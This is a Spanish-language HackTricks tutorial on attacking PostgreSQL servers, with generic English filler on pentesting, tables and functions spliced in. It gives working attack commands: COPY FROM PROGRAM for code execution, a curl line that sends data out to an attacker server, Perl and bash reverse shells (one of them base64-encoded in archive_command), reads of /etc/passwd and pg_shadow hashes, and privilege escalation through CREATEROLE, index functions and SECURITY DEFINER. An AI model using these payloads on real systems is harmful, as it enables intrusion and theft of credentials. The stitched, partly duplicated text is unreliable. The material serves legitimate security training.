hacktricks/network-services-pentesting/pentesting-postgresql.md

41 KiB

5432,5433 - Pentesting Postgresql


Utiliza Trickest para construir y automatizar fácilmente flujos de trabajo con las herramientas comunitarias más avanzadas del mundo.
Obtén acceso hoy mismo:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Información básica

PostgreSQL es un sistema de base de datos relacional de código abierto que utiliza y amplía el lenguaje SQL.

Puerto predeterminado: 5432, y si este puerto ya está en uso, parece que postgresql utilizará el siguiente puerto (probablemente 5433) que no está en uso.

PORT     STATE SERVICE
5432/tcp open  pgsql

Conexión y Enumeración Básica

Conexión

Para realizar pruebas de penetración en PostgreSQL, primero debemos establecer una conexión con el servidor de la base de datos. Podemos utilizar la herramienta psql para conectarnos a la base de datos PostgreSQL desde la línea de comandos.

psql -h <host> -p <port> -U <username> -d <database>

Donde:

  • <host> es la dirección IP o el nombre de dominio del servidor PostgreSQL.
  • <port> es el número de puerto en el que se está ejecutando el servidor PostgreSQL (por defecto es 5432).
  • <username> es el nombre de usuario para autenticarse en el servidor PostgreSQL.
  • <database> es el nombre de la base de datos a la que queremos conectarnos.

Enumeración Básica

Una vez que nos hemos conectado con éxito al servidor PostgreSQL, podemos realizar una enumeración básica para obtener información sobre la base de datos y los usuarios.

Obtener información de la base de datos

Podemos utilizar el comando \l en psql para obtener una lista de todas las bases de datos disponibles en el servidor PostgreSQL.

\l

Obtener información de los usuarios

Podemos utilizar el comando \du en psql para obtener una lista de todos los usuarios registrados en el servidor PostgreSQL.

\du

Estos comandos nos proporcionarán información básica sobre la configuración de la base de datos y los usuarios registrados, lo cual es útil para comenzar a explorar y analizar el entorno de PostgreSQL durante las pruebas de penetración.

psql -U <myuser> # Open psql console with user
psql -h <host> -U <username> -d <database> # Remote connection
psql -h <host> -p <port> -U <username> -W <password> <database> # Remote connection
psql -h localhost -d <database_name> -U <User> #Password will be prompted
\list # List databases
\c <database> # use the database
\d # List tables
\du+ # Get users roles

# Get current user
Select user;

# List schemas
SELECT schema_name,schema_owner FROM information_schema.schemata;
\dn+

#List databases
SELECT datname FROM pg_database;

#Read credentials (usernames + pwd hash)
SELECT usename, passwd from pg_shadow;

# Get languages
SELECT lanname,lanacl FROM pg_language;

# Show installed extensions
SHOW rds.extensions;
SELECT * FROM pg_extension;

# Get history of commands executed
\s

{% hint style="warning" %} Si al ejecutar \list encuentras una base de datos llamada rdsadmin, sabes que estás dentro de una base de datos de PostgreSQL de AWS. {% endhint %}

Para obtener más información sobre cómo abusar de una base de datos PostgreSQL, consulta:

{% content-ref url="../pentesting-web/sql-injection/postgresql-injection/" %} postgresql-injection {% endcontent-ref %}

Enumeración automática

msf> use auxiliary/scanner/postgres/postgres_version
msf> use auxiliary/scanner/postgres/postgres_dbname_flag_injection

Fuerza bruta

Escaneo de puertos

Según esta investigación, cuando un intento de conexión falla, dblink lanza una excepción sqlclient_unable_to_establish_sqlconnection que incluye una explicación del error. A continuación se muestran ejemplos de estos detalles.

SELECT * FROM dblink_connect('host=1.2.3.4
port=5678
user=name
password=secret
dbname=abc
connect_timeout=10');
  • El host está caído

DETALLE: no se pudo conectar al servidor: No hay ruta hacia el host ¿El servidor se está ejecutando en el host "1.2.3.4" y aceptando conexiones TCP/IP en el puerto 5678?

  • El puerto está cerrado
DETAIL:  could not connect to server: Connection refused Is  the  server
running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?
  • El puerto está abierto
DETAIL:  server closed the connection unexpectedly This  probably  means
the server terminated abnormally before or while processing the request

Pentesting PostgreSQL

Introduction

PostgreSQL is an open-source relational database management system (RDBMS) that is widely used in web applications. As a pentester, it is important to understand how to assess the security of PostgreSQL installations and identify potential vulnerabilities.

Enumeration

Port Scanning

To identify PostgreSQL installations on a target network, you can perform a port scan using tools like Nmap. By default, PostgreSQL listens on port 5432. However, this port can be changed during installation, so it is important to scan for open ports.

nmap -p 5432 <target_ip>

Banner Grabbing

Once you have identified an open PostgreSQL port, you can perform banner grabbing to gather information about the version and configuration of the server. This can be done using tools like telnet or nc.

telnet <target_ip> 5432

Exploitation

Default Credentials

PostgreSQL does not have default credentials, but it is common for users to set weak or easily guessable passwords. You can use tools like Hydra or Medusa to perform brute-force attacks against the PostgreSQL authentication system.

hydra -L users.txt -P passwords.txt <target_ip> postgresql

SQL Injection

SQL injection vulnerabilities can allow an attacker to execute arbitrary SQL queries against a PostgreSQL database. This can lead to unauthorized access, data manipulation, or even remote code execution.

To test for SQL injection vulnerabilities, you can use tools like SQLMap or manually craft SQL queries to exploit the application.

sqlmap -u "http://example.com/page?id=1" --dbms=postgresql

Privilege Escalation

If you have gained access to a PostgreSQL database with limited privileges, you can attempt to escalate your privileges to gain administrative access. This can be done by exploiting misconfigurations, weak permissions, or vulnerabilities in the PostgreSQL server.

Conclusion

Pentesting PostgreSQL involves identifying installations, enumerating vulnerabilities, and exploiting weaknesses to gain unauthorized access or escalate privileges. By understanding the techniques and tools used in PostgreSQL pentesting, you can effectively assess the security of PostgreSQL installations and help protect against potential attacks.

DETAIL:  FATAL:  password authentication failed for user "name"
  • El puerto está abierto o filtrado
DETAIL:  could not connect to server: Connection timed out Is the server
running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?

Desafortunadamente, no parece haber una forma de obtener los detalles de la excepción dentro de una función PL/pgSQL. Pero puedes obtener los detalles si puedes conectarte directamente al servidor PostgreSQL. Si no es posible obtener nombres de usuario y contraseñas directamente de las tablas del sistema, el ataque de lista de palabras descrito en la sección anterior podría tener éxito.

Enumeración de privilegios

Roles

Tipos de roles
rolsuper El rol tiene privilegios de superusuario
rolinherit El rol hereda automáticamente los privilegios de los roles de los que es miembro
rolcreaterole El rol puede crear más roles
rolcreatedb El rol puede crear bases de datos
rolcanlogin El rol puede iniciar sesión. Es decir, este rol puede ser utilizado como identificador de autorización de sesión inicial
rolreplication El rol es un rol de replicación. Un rol de replicación puede iniciar conexiones de replicación y crear y eliminar espacios de replicación.
rolconnlimit Para roles que pueden iniciar sesión, esto establece el número máximo de conexiones simultáneas que este rol puede realizar. -1 significa sin límite.
rolpassword No es la contraseña (siempre se muestra como ********)
rolvaliduntil Hora de caducidad de la contraseña (solo se utiliza para la autenticación de contraseña); nulo si no hay caducidad
rolbypassrls El rol omite todas las políticas de seguridad a nivel de fila, consulte Sección 5.8 para obtener más información.
rolconfig Valores predeterminados específicos del rol para las variables de configuración en tiempo de ejecución
oid ID del rol

Grupos interesantes

  • Si eres miembro de pg_execute_server_program puedes ejecutar programas
  • Si eres miembro de pg_read_server_files puedes leer archivos
  • Si eres miembro de pg_write_server_files puedes escribir archivos

{% hint style="info" %} Ten en cuenta que en Postgres un usuario, un grupo y un rol son lo mismo. Solo depende de cómo lo uses y si lo permites iniciar sesión. {% endhint %}

# Get users roles
\du

#Get users roles & groups
# r.rolpassword
# r.rolconfig,
SELECT
r.rolname,
r.rolsuper,
r.rolinherit,
r.rolcreaterole,
r.rolcreatedb,
r.rolcanlogin,
r.rolbypassrls,
r.rolconnlimit,
r.rolvaliduntil,
r.oid,
ARRAY(SELECT b.rolname
FROM pg_catalog.pg_auth_members m
JOIN pg_catalog.pg_roles b ON (m.roleid = b.oid)
WHERE m.member = r.oid) as memberof
, r.rolreplication
FROM pg_catalog.pg_roles r
ORDER BY 1;

# Check if current user is superiser
## If response is "on" then true, if "off" then false
SELECT current_setting('is_superuser');

# Try to grant access to groups
## For doing this you need to be admin on the role, superadmin or have CREATEROLE role (see next section)
GRANT pg_execute_server_program TO "username";
GRANT pg_read_server_files TO "username";
GRANT pg_write_server_files TO "username";
## You will probably get this error:
## Cannot GRANT on the "pg_write_server_files" role without being a member of the role.

# Create new role (user) as member of a role (group)
CREATE ROLE u LOGIN PASSWORD 'lriohfugwebfdwrr' IN GROUP pg_read_server_files;
## Common error
## Cannot GRANT on the "pg_read_server_files" role without being a member of the role.

Tablas

PostgreSQL uses tables to store data. A table is a collection of rows, where each row represents a record and each column represents a field or attribute of that record.

PostgreSQL utiliza tablas para almacenar datos. Una tabla es una colección de filas, donde cada fila representa un registro y cada columna representa un campo o atributo de ese registro.

Creating Tables

To create a table in PostgreSQL, you can use the CREATE TABLE statement. Here's an example:

CREATE TABLE employees (
    id SERIAL PRIMARY KEY,
    name VARCHAR(100),
    age INTEGER,
    salary DECIMAL(10, 2)
);

This statement creates a table called employees with four columns: id, name, age, and salary. The id column is defined as a SERIAL type, which automatically generates a unique value for each row. The name column is of type VARCHAR with a maximum length of 100 characters. The age column is of type INTEGER, and the salary column is of type DECIMAL with a precision of 10 and a scale of 2.

Modifying Tables

You can modify an existing table in PostgreSQL using the ALTER TABLE statement. Here are some common modifications you can make:

  • Adding a new column:
ALTER TABLE employees ADD COLUMN email VARCHAR(255);

This statement adds a new column called email to the employees table with a maximum length of 255 characters.

  • Modifying a column's data type:
ALTER TABLE employees ALTER COLUMN age TYPE SMALLINT;

This statement changes the data type of the age column from INTEGER to SMALLINT.

  • Dropping a column:
ALTER TABLE employees DROP COLUMN salary;

This statement removes the salary column from the employees table.

Deleting Tables

To delete a table in PostgreSQL, you can use the DROP TABLE statement. Here's an example:

DROP TABLE employees;

This statement deletes the employees table and all its data.

Querying Tables

To query data from a table in PostgreSQL, you can use the SELECT statement. Here's an example:

SELECT * FROM employees;

This statement retrieves all rows and columns from the employees table.

You can also specify which columns to retrieve and add conditions to filter the results. For example:

SELECT name, age FROM employees WHERE salary > 50000;

This statement retrieves the name and age columns from the employees table for rows where the salary is greater than 50000.

Conclusion

Tables are a fundamental component of PostgreSQL databases. Understanding how to create, modify, and query tables is essential for effective database management and data retrieval.

# Get owners of tables
select schemaname,tablename,tableowner from pg_tables;
## Get tables where user is owner
select schemaname,tablename,tableowner from pg_tables WHERE tableowner = 'postgres';

# Get your permissions over tables
SELECT grantee,table_schema,table_name,privilege_type FROM information_schema.role_table_grants;

#Check users privileges over a table (pg_shadow on this example)
## If nothing, you don't have any permission
SELECT grantee,table_schema,table_name,privilege_type FROM information_schema.role_table_grants WHERE table_name='pg_shadow';

Funciones

Functions in PostgreSQL are named blocks of code that can be executed by calling their name. They are used to perform specific tasks and can accept parameters and return values. Functions can be created using the CREATE FUNCTION statement and can be written in various programming languages such as SQL, PL/pgSQL, Python, etc.

Creating Functions

To create a function in PostgreSQL, you can use the CREATE FUNCTION statement followed by the function name, input parameters (if any), return type, and the code block enclosed in a BEGIN and END block. Here is the syntax:

CREATE FUNCTION function_name (parameter1 datatype, parameter2 datatype, ...)
  RETURNS return_type
  LANGUAGE language_name
AS $$
  -- Function code goes here
$$;

Example

Let's create a simple function that calculates the square of a given number:

CREATE FUNCTION square(num integer)
  RETURNS integer
AS $$
BEGIN
  RETURN num * num;
END;
$$;

Calling Functions

Once a function is created, you can call it by using its name followed by the input parameters (if any). Here is the syntax:

SELECT function_name(parameter1, parameter2, ...);

Using our previous example, we can call the square function as follows:

SELECT square(5);

This will return the square of 5, which is 25.

Conclusion

Functions in PostgreSQL are powerful tools that allow you to encapsulate reusable code and perform specific tasks. By creating and calling functions, you can enhance the functionality and flexibility of your PostgreSQL database.

# Interesting functions are inside pg_catalog
\df * #Get all
\df *pg_ls* #Get by substring
\df+ pg_read_binary_file #Check who has access

# Get all functions of a schema
\df pg_catalog.*

# Get all functions of a schema (pg_catalog in this case)
SELECT routines.routine_name, parameters.data_type, parameters.ordinal_position
FROM information_schema.routines
LEFT JOIN information_schema.parameters ON routines.specific_name=parameters.specific_name
WHERE routines.specific_schema='pg_catalog'
ORDER BY routines.routine_name, parameters.ordinal_position;

# Another aparent option
SELECT * FROM pg_proc;

Acciones en el sistema de archivos

Leer directorios y archivos

A partir de este commit, los miembros del grupo definido DEFAULT_ROLE_READ_SERVER_FILES (llamado pg_read_server_files) y los superusuarios pueden utilizar el método COPY en cualquier ruta (verificar convert_and_check_filename en genfile.c):

# Read file
CREATE TABLE demo(t text);
COPY demo from '/etc/passwd';
SELECT * FROM demo;

{% hint style="warning" %} Recuerda que si no eres un superusuario pero tienes los permisos CREATEROLE, puedes convertirte en miembro de ese grupo:

GRANT pg_read_server_files TO username;

Más información. {% endhint %}

Existen otras funciones de postgres que se pueden utilizar para leer archivos o listar un directorio. Solo los superusuarios y los usuarios con permisos explícitos pueden utilizarlas:

# Before executing these function go to the postgres DB (not in the template1)
\c postgres
## If you don't do this, you might get "permission denied" error even if you have permission

select * from pg_ls_dir('/tmp');
select * from pg_read_file('/etc/passwd', 0, 1000000);
select * from pg_read_binary_file('/etc/passwd');

# Check who has permissions
\df+ pg_ls_dir
\df+ pg_read_file
\df+ pg_read_binary_file

# Try to grant permissions
GRANT EXECUTE ON function pg_catalog.pg_ls_dir(text) TO username;
# By default you can only access files in the datadirectory
SHOW data_directory;
# But if you are a member of the group pg_read_server_files
# You can access any file, anywhere
GRANT pg_read_server_files TO username;
# Check CREATEROLE privilege escalation

Puedes encontrar más funciones en https://www.postgresql.org/docs/current/functions-admin.html

Escritura de archivos simple

Solo los super usuarios y los miembros de pg_write_server_files pueden usar copy para escribir archivos.

{% code overflow="wrap" %}

copy (select convert_from(decode('<ENCODED_PAYLOAD>','base64'),'utf-8')) to '/just/a/path.exec';

{% endcode %}

{% hint style="warning" %} Recuerda que si no eres un superusuario pero tienes los permisos CREATEROLE, puedes convertirte en miembro de ese grupo:

GRANT pg_write_server_files TO username;

Más información. {% endhint %}

Recuerda que COPY no puede manejar caracteres de nueva línea, por lo tanto, incluso si estás usando una carga útil en base64, debes enviar una sola línea.
Una limitación muy importante de esta técnica es que copy no se puede utilizar para escribir archivos binarios ya que modifica algunos valores binarios.

Carga de archivos binarios

Sin embargo, hay otras técnicas para cargar archivos binarios grandes:

{% content-ref url="../pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md" %} big-binary-files-upload-postgresql.md {% endcontent-ref %}

Consejo de recompensa por errores: regístrate en Intigriti, una plataforma premium de recompensas por errores creada por hackers, para hackers. ¡Únete a nosotros en https://go.intigriti.com/hacktricks hoy mismo y comienza a ganar recompensas de hasta $100,000!

{% embed url="https://go.intigriti.com/hacktricks" %}

RCE

RCE a programa

Desde la versión 9.3, solo los superusuarios y los miembros del grupo pg_execute_server_program pueden usar copy para RCE (ejemplo con exfiltración:

'; copy (SELECT '') to program 'curl http://YOUR-SERVER?f=`ls -l|base64`'-- -

Ejemplo para ejecutar:

#PoC
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;

#Reverse shell
#Notice that in order to scape a single quote you need to put 2 single quotes
COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';

{% hint style="warning" %} Recuerda que si no eres un superusuario pero tienes los permisos CREATEROLE, puedes convertirte en miembro de ese grupo:

GRANT pg_execute_server_program TO username;

Más información. {% endhint %}

O utiliza el módulo multi/postgres/postgres_copy_from_program_cmd_exec de metasploit.
Más información sobre esta vulnerabilidad aquí. Aunque se informó como CVE-2019-9193, Postges declaró que esto era una característica y no se corregirá.

RCE con Lenguajes de PostgreSQL

{% content-ref url="../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md" %} rce-with-postgresql-languages.md {% endcontent-ref %}

RCE con extensiones de PostgreSQL

Una vez que hayas aprendido del post anterior cómo cargar archivos binarios, puedes intentar obtener RCE cargando una extensión de PostgreSQL y cargándola.

{% content-ref url="../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md" %} rce-with-postgresql-extensions.md {% endcontent-ref %}

RCE en el archivo de configuración de PostgreSQL

El archivo de configuración de PostgreSQL es editable por el usuario postgres, que es el que ejecuta la base de datos, por lo que como superusuario puedes escribir archivos en el sistema de archivos y, por lo tanto, puedes sobrescribir este archivo.

RCE con ssl_passphrase_command

El archivo de configuración tiene algunos atributos interesantes que pueden llevar a RCE:

  • ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key' Ruta de la clave privada de la base de datos.
  • ssl_passphrase_command = '' Si el archivo privado está protegido por contraseña (encriptado), PostgreSQL ejecutará el comando indicado en este atributo.
  • ssl_passphrase_command_supports_reload = off Si este atributo está activado, el comando se ejecutará si la clave está protegida por contraseña cuando se ejecute pg_reload_conf().

Entonces, un atacante deberá:

  1. Extraer la clave privada del servidor.
  2. Encriptar la clave privada descargada: rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key
  3. Sobrescribir el archivo.
  4. Extraer la configuración actual de PostgreSQL.
  5. Sobrescribir la configuración con la configuración de los atributos mencionados: ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"' ssl_passphrase_command_supports_reload = on
  6. Ejecutar pg_reload_conf().

Al probar esto, noté que solo funcionará si el archivo de clave privada tiene permisos 640, es propiedad de root y del grupo ssl-cert o postgres (para que el usuario postgres pueda leerlo) y se encuentra en /var/lib/postgresql/12/main.

Más información sobre esta técnica aquí.

RCE con archive_command

Otro atributo en el archivo de configuración que se puede explotar es archive_command.

Para que esto funcione, la configuración archive_mode debe ser 'on' o 'always'. Si eso es cierto, entonces podríamos sobrescribir el comando en archive_command y forzar su ejecución a través de las operaciones de WAL (write-ahead logging).

Los pasos generales son:

  1. Verificar si el modo de archivo está habilitado: SELECT current_setting('archive_mode')
  2. Sobrescribir archive_command con el payload. Por ejemplo, un reverse shell: archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'
  3. Recargar la configuración: SELECT pg_reload_conf()
  4. Forzar la ejecución de la operación WAL, que llamará al comando de archivo: SELECT pg_switch_wal() o SELECT pg_switch_xlog() para algunas versiones de Postgres

Más información sobre esta configuración y sobre WAL aquí.

Elevación de privilegios en Postgres

Elevación de privilegios CREATEROLE

Conceder

Según la documentación: Los roles que tienen el privilegio CREATEROLE pueden conceder o revocar membresía en cualquier rol que no sea un superusuario.

Entonces, si tienes el permiso CREATEROLE, podrías otorgarte acceso a otros roles (que no sean superusuario) que te pueden dar la opción de leer y escribir archivos y ejecutar comandos:

# Access to execute commands
GRANT pg_execute_server_program TO username;
# Access to read files
GRANT pg_read_server_files TO username;
# Access to write files
GRANT pg_write_server_files TO username;

Modificar Contraseña

Los usuarios con este rol también pueden cambiar las contraseñas de otros no superusuarios:

#Change password
ALTER USER user_name WITH PASSWORD 'new_password';

Escalación de privilegios a SUPERUSER

Es bastante común encontrar que los usuarios locales pueden iniciar sesión en PostgreSQL sin proporcionar ninguna contraseña. Por lo tanto, una vez que hayas obtenido permisos para ejecutar código, puedes abusar de estos permisos para obtener el rol de SUPERUSER:

COPY (select '') to PROGRAM 'psql -U <super_user> -c "ALTER USER <your_username> WITH SUPERUSER;"';

{% hint style="info" %} Esto suele ser posible debido a las siguientes líneas en el archivo pg_hba.conf:

# "local" is for Unix domain socket connections only
local   all             all                                     trust
# IPv4 local connections:
host    all             all             127.0.0.1/32            trust
# IPv6 local connections:
host    all             all             ::1/128                 trust

{% endhint %}

ALTER TABLE privesc

En este informe se explica cómo fue posible realizar una escalada de privilegios en Postgres GCP abusando del privilegio ALTER TABLE que se le otorgó al usuario.

Cuando intentas hacer que otro usuario sea propietario de una tabla, deberías obtener un error que lo impida, pero aparentemente GCP le dio esa opción al usuario postgres que no es superusuario en GCP:

Uniendo esta idea con el hecho de que cuando se ejecutan los comandos INSERT/UPDATE/ANALYZE en una tabla con una función de índice, la función se llama como parte del comando con los permisos del propietario de la tabla. Es posible crear un índice con una función y dar permisos de propietario a un superusuario sobre esa tabla, y luego ejecutar ANALYZE sobre la tabla con la función maliciosa que podrá ejecutar comandos porque está utilizando los privilegios del propietario.

GetUserIdAndSecContext(&save_userid, &save_sec_context);
SetUserIdAndSecContext(onerel->rd_rel->relowner,
save_sec_context | SECURITY_RESTRICTED_OPERATION);

Explotación

  1. Crear una nueva tabla.
  2. Insertar contenido ficticio en la tabla para que la función de índice tenga algo con lo que trabajar.
  3. Crear una función de índice maliciosa (con nuestra carga útil de ejecución de código) en la tabla.
  4. ALTERAR el propietario de la tabla a cloudsqladmin, el rol de superusuario de GCP utilizado solo por Cloud SQL para mantener y gestionar la base de datos.
  5. ANALIZAR la tabla, forzando al motor de PostgreSQL a cambiar al contexto de usuario del propietario de la tabla (cloudsqladmin) y llamar a la función de índice maliciosa con los permisos de cloudsqladmin, lo que resulta en la ejecución de nuestro comando de shell, al cual no teníamos permiso para ejecutar anteriormente.

En PostgreSQL, este flujo se ve algo así:

CREATE TABLE temp_table (data text);
CREATE TABLE shell_commands_results (data text);

INSERT INTO temp_table VALUES ('dummy content');

/* PostgreSQL does not allow creating a VOLATILE index function, so first we create IMMUTABLE index function */
CREATE OR REPLACE FUNCTION public.suid_function(text) RETURNS text
LANGUAGE sql IMMUTABLE AS 'select ''nothing'';';

CREATE INDEX index_malicious ON public.temp_table (suid_function(data));

ALTER TABLE temp_table OWNER TO cloudsqladmin;

/* Replace the function with VOLATILE index function to bypass the PostgreSQL restriction */
CREATE OR REPLACE FUNCTION public.suid_function(text) RETURNS text
LANGUAGE sql VOLATILE AS 'COPY public.shell_commands_results (data) FROM PROGRAM ''/usr/bin/id''; select ''test'';';

ANALYZE public.temp_table;

Después de ejecutar la consulta de explotación SQL, la tabla shell_commands_results contiene la salida del código ejecutado:

uid=2345(postgres) gid=2345(postgres) groups=2345(postgres)

Inicio de sesión local

Algunas instancias de postgresql mal configuradas podrían permitir el inicio de sesión de cualquier usuario local, es posible hacerlo desde 127.0.0.1 utilizando la función dblink:

\du * # Get Users
\l    # Get databases
SELECT * FROM dblink('host=127.0.0.1
port=5432
user=someuser
password=supersecret
dbname=somedb',
'Select usename,passwd from pg_shadow')
RETURNS (result TEXT);

{% hint style="warning" %} Ten en cuenta que para que la consulta anterior funcione debe existir la función dblink. Si no existe, puedes intentar crearla con

CREATE EXTENSION dblink;

{% endhint %}

Si tienes la contraseña de un usuario con más privilegios, pero el usuario no tiene permitido iniciar sesión desde una IP externa, puedes usar la siguiente función para ejecutar consultas como ese usuario:

SELECT * FROM dblink('host=127.0.0.1
user=someuser
dbname=somedb',
'Select usename,passwd from pg_shadow')
RETURNS (result TEXT);

Es posible verificar si esta función existe con:

SELECT * FROM pg_proc WHERE proname='dblink' AND pronargs=2;

Función definida por el usuario con SECURITY DEFINER

****En este informe, los pentesters lograron escalar privilegios dentro de una instancia de postgres proporcionada por IBM porque encontraron esta función con la bandera SECURITY DEFINER:

CREATE OR REPLACE FUNCTION public.create_subscription(IN subscription_name text,IN host_ip text,IN portnum text,IN password text,IN username text,IN db_name text,IN publisher_name text)
RETURNS text
LANGUAGE 'plpgsql'
    VOLATILE SECURITY DEFINER
    PARALLEL UNSAFE
COST 100

AS $BODY$
DECLARE
persist_dblink_extension boolean;
BEGIN
persist_dblink_extension := create_dblink_extension();
PERFORM dblink_connect(format('dbname=%s', db_name));
PERFORM dblink_exec(format('CREATE SUBSCRIPTION %s CONNECTION ''host=%s port=%s password=%s user=%s dbname=%s sslmode=require'' PUBLICATION %s',
subscription_name, host_ip, portNum, password, username, db_name, publisher_name));
PERFORM dblink_disconnect();
…

Como se explica en la documentación, una función con SECURITY DEFINER se ejecuta con los privilegios del usuario que la posee. Por lo tanto, si la función es vulnerable a la inyección SQL o realiza alguna acción privilegiada con parámetros controlados por el atacante, podría ser abusada para escalar privilegios dentro de postgres.

En la línea 4 del código anterior se puede ver que la función tiene la bandera SECURITY DEFINER.

CREATE SUBSCRIPTION test3 CONNECTION 'host=127.0.0.1 port=5432 password=a
user=ibm dbname=ibmclouddb sslmode=require' PUBLICATION test2_publication
WITH (create_slot = false); INSERT INTO public.test3(data) VALUES(current_user);

Y luego ejecutar comandos:

Realizar un ataque de fuerza bruta con PL/pgSQL

PL/pgSQL, como un lenguaje de programación completo, permite un mayor control procedural que SQL, incluyendo la capacidad de utilizar bucles y otras estructuras de control. Las declaraciones SQL y los disparadores pueden llamar a funciones creadas en el lenguaje PL/pgSQL.
Puede abusar de este lenguaje para solicitar a PostgreSQL que realice un ataque de fuerza bruta a las credenciales de los usuarios.

{% content-ref url="../pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md" %} pl-pgsql-password-bruteforce.md {% endcontent-ref %}

POST

msf> use auxiliary/scanner/postgres/postgres_hashdump
msf> use auxiliary/scanner/postgres/postgres_schemadump
msf> use auxiliary/admin/postgres/postgres_readfile
msf> use exploit/linux/postgres/postgres_payload
msf> use exploit/windows/postgres/postgres_payload

registro

Dentro del archivo postgresql.conf puedes habilitar los registros de postgresql cambiando:

log_statement = 'all'
log_filename = 'postgresql-%Y-%m-%d_%H%M%S.log'
logging_collector = on
sudo service postgresql restart
#Find the logs in /var/lib/postgresql/<PG_Version>/main/log/
#or in /var/lib/postgresql/<PG_Version>/main/pg_log/

Luego, reinicie el servicio.

pgadmin

pgadmin es una plataforma de administración y desarrollo para PostgreSQL.
Puede encontrar contraseñas dentro del archivo pgadmin4.db.
Puede descifrarlas utilizando la función decrypt dentro del script: https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py

sqlite3 pgadmin4.db ".schema"
sqlite3 pgadmin4.db "select * from user;"
sqlite3 pgadmin4.db "select * from server;"
string pgadmin4.db

pg_hba

La autenticación del cliente es controlada por un archivo de configuración frecuentemente llamado pg_hba.conf. Este archivo tiene un conjunto de registros. Un registro puede tener uno de los siguientes siete formatos:

Cada registro especifica un tipo de conexión, un rango de direcciones IP del cliente (si es relevante para el tipo de conexión), un nombre de base de datos, un nombre de usuario y el método de autenticación que se utilizará para las conexiones que cumplan con estos parámetros. El primer registro con una coincidencia en el tipo de conexión, dirección IP del cliente, base de datos solicitada y nombre de usuario se utiliza para realizar la autenticación. No hay una "opción de respaldo": si se elige un registro y la autenticación falla, los registros posteriores no se consideran. Si no hay ningún registro que coincida, se deniega el acceso.
Los métodos de autenticación basados en contraseña son md5, crypt y password. Estos métodos funcionan de manera similar, excepto por la forma en que se envía la contraseña a través de la conexión: respectivamente, en formato MD5-hashed, encriptada con crypt y en texto claro. Una limitación es que el método crypt no funciona con contraseñas que han sido encriptadas en pg_authid.

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥


Utiliza Trickest para construir y automatizar flujos de trabajo con las herramientas comunitarias más avanzadas del mundo.
Obtén acceso hoy mismo:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}